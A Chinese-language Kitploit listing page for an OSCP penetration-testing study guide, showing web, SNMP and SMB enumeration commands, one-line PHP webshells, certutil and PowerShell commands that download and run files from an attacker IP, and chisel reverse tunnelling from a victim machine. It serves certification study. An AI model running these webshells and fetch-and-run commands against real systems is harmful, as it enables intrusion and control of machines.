Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
OSCP — OSCP 学习指南 | Kitploit
工具/GitHubGitHub/rootsecdev/oscp
侦察漏洞利用Web应用程序漏洞利用后渗透利用Web安全网络安全渗透测试学习与教育红队
GitHubrootsecdev/oscp

OSCP

OSCP 学习指南

查看仓库
42513年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

OSCP

OSCP 学习指南

目录

枚举与侦察

Web 枚举

Nikto 扫描:

root@kitploit:~
nikto -h http://10.10.10.1

使用不同工具进行目录爆破:

DIRB

root@kitploit:~
dirb http://10.10.10.1

Gobuster

root@kitploit:~
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx

Web 应用渗透测试

XSS 载荷: 速查表:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

使用 netcat 监听器或 python Web 服务器进行基本 XSS 表单测试

root@kitploit:~

跨站脚本转储 base64 编码的 cookies。确保在 burp 中使用 ctrl + u 进行 URL 编码

root@kitploit:~

Webshell

参考:https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html

用于命令执行的简单 PHP webshell

root@kitploit:~
<?php system($_REQUEST ['cmd']) ?>
root@kitploit:~
<?php system($_GET['cmd']); ?>

SNMP 渗透测试

端口 161 UDP

root@kitploit:~
snmpwalk -c public -v2c 10.129.213.210
root@kitploit:~
snmp-check 10.129.213.210

SMB 渗透测试

root@kitploit:~
crackmapexec smb 10.129.70.254 

检测开放的匿名共享

root@kitploit:~
smbclient -L //10.129.70.254

空认证

root@kitploit:~
smbclient -N -L //10.129.70.254

后渗透利用

下载和传输文件

Certutil:

root@kitploit:~
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

PowerShell:

root@kitploit:~
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
root@kitploit:~
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"

端口转发与隧道

使用 Chisel:

使用端口转发使 kali 机器上的 910 端口可用的示例

root@kitploit:~
on victim machine setup port forwarding
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
root@kitploit:~
On Kali attack box setup a reverse listner for port forward with chisel
./chisel server --port 5555 --reverse
下载工具